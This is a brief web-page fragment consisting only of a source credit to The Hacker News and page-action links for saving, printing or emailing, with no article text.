via:  thehackernews

Save pagePDF pageEmail pagePrint page